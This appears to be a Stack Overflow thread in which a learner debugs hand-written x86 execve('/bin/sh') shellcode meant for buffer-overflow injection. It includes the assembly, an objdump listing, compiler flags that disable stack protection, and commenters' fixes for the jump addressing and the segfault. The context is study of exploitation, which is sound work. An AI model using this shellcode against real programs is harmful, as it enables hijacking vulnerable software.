# Confused with system call instructions in assembly code

Tags: assembly, x86

I am trying to study code injection through buffer overflows. I want to inject the following code onto the stack:

```
#include <stdio.h>
void main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}
```

I wrote the following assembly instructions corresponding to this.

```
void main() {
    __asm__("jmp 0x2a\n\t"          // 3 bytes - jumps to last instruction
        "popl %esi\n\t"         // 1 byte - get the return address i.e. address of string in register
        "movl %esi,0x8(%esi)\n\t"   // 3 bytes - push contents on stack for syscall
        "movb $0x0,0x7(%esi)\n\t"   // 4 bytes - push contents on stack for syscall
        "movl $0x0,0xc(%esi)\n\t"   // 7 bytes - push contents on stack for syscall
        "movl $0xb,%eax\n\t"        // 5 bytes - store syscall id 11 to register
        "movl %esi,%ebx\n\t"        // 2 bytes - prepare registers for exec syscall
        "leal 0x8(%esi),%ecx\n\t"   // 3 bytes - prepare registers for exec syscall
        "leal 0xc(%esi),%edx\n\t"   // 3 bytes - prepare registers for exec syscall
        "int $0x80\n\t"         // 2 bytes - actual exec syscall
        "movl $0x1, %eax\n\t"       // 5 bytes - prepare registers for exit syscall in case exec fails
        "movl $0x0, %ebx\n\t"       // 5 bytes - prepare registers for exit syscall
        "int $0x80\n\t"         // 2 bytes - exit syscall
        "call -0x2f\n\t"        // 5 bytes - jumps to second instruction pushing the address of string "/bin/sh" on the stack.
        ".string \"/bin/sh\"\n\t"); // 8 bytes
}
```

On compiling the above program via

> gcc shellcodeasm.c -m32 -g -o shellcode -fno-stack-protector -z execstack -static

and

> running objdump -S shellcode

I get the following dump for main:

```
08048e24 <main>:
void main() {
 8048e24:       55                      push   %ebp
 8048e25:       89 e5                   mov    %esp,%ebp
        __asm__("jmp 0x2a\n\t"                  // 3 bytes - jumps to second last instruction
 8048e27:       e9 fe 71 fb f7          jmp    2a <data.8998+0x6>
 8048e2c:       5e                      pop    %esi
 8048e2d:       89 76 08                mov    %esi,0x8(%esi)
 8048e30:       c6 46 07 00             movb   $0x0,0x7(%esi)
 8048e34:       c7 46 0c 00 00 00 00    movl   $0x0,0xc(%esi)
 8048e3b:       b8 0b 00 00 00          mov    $0xb,%eax
 8048e40:       89 f3                   mov    %esi,%ebx
 8048e42:       8d 4e 08                lea    0x8(%esi),%ecx
 8048e45:       8d 56 0c                lea    0xc(%esi),%edx
 8048e48:       cd 80                   int    $0x80
 8048e4a:       b8 01 00 00 00          mov    $0x1,%eax
 8048e4f:       bb 00 00 00 00          mov    $0x0,%ebx
 8048e54:       cd 80                   int    $0x80
 8048e56:       e8 76 71 fb f7          call   ffffffd1 <_end+0xf7f14ccd>
 8048e5b:       2f                      das
 8048e5c:       62 69 6e                bound  %ebp,0x6e(%ecx)
 8048e5f:       2f                      das
 8048e60:       73 68                   jae    8048eca <__libc_start_main+0x5a>
 8048e62:       00 5d c3                add    %bl,-0x3d(%ebp)
 8048e65:       66 90                   xchg   %ax,%ax
 8048e67:       66 90                   xchg   %ax,%ax
 8048e69:       66 90                   xchg   %ax,%ax
 8048e6b:       66 90                   xchg   %ax,%ax
 8048e6d:       66 90                   xchg   %ax,%ax
 8048e6f:       90                      nop
```

Every instruction is as expected except the first **jmp** and last **call** instructions. I expected the **jmp instruction** to jump to the **call instruction** but that is not happening. Instead its argument is showing something else **2a  data.8998+0x6** which I don't understand. Please tell me where I am wrong. Also help with with what I should do to make it work.

Comment: Use a label as everybody else :) As it is, you jump to absolute address `0x2a`. If you insist on hand-counting bytes, try something like `.+0x2a` (adjust the offset as necessary).

Comment: There is a reason C defines some behaviour as **undefined** - think about the implications of that term.

Comment: @Jester thanks. After your suggestions at least I got the addresses correct. Though I am still getting segmentation fault. I thought jmp jumps to relative addresses.

Comment: @Olaf can you give example of what is undefined here. I can't get you correctly.

Comment: http://port70.net/~nsz/c/c11/n1570.html#J.2

Comment: Jumps are encoded as relative offsets in machine code, but the assembler expects absolute addresses as convenience. You get a segfault because you say "_inject the following code onto the stack_" but the code posted is not on the stack, it's in the `.text` section which is read-only. Add `-Wl,-N` option to the `gcc` command.

Comment: @Jester I know the code is in .text section. By inject i meant to inject these assembly instructions on stack of some other program. `gcc shellcodeasm.c -m32 -g -o shellcode -fno-stack-protector -z execstack -static -N` works without any error. What special does the -N flag does?

Comment: Makes `.text` writable.

Comment: @Jester I don't understand. What writes am I making to `.text` section here.

Comment: All the `mov  %esi,0x8(%esi)` and friends? The three instructions starting from `8048e2d`.

Comment: @Jester Thank you. You are right. I didn't realize it till now. Actually I have seen a lot of assembly code today. My mind isn't working properly now. I need to get some rest.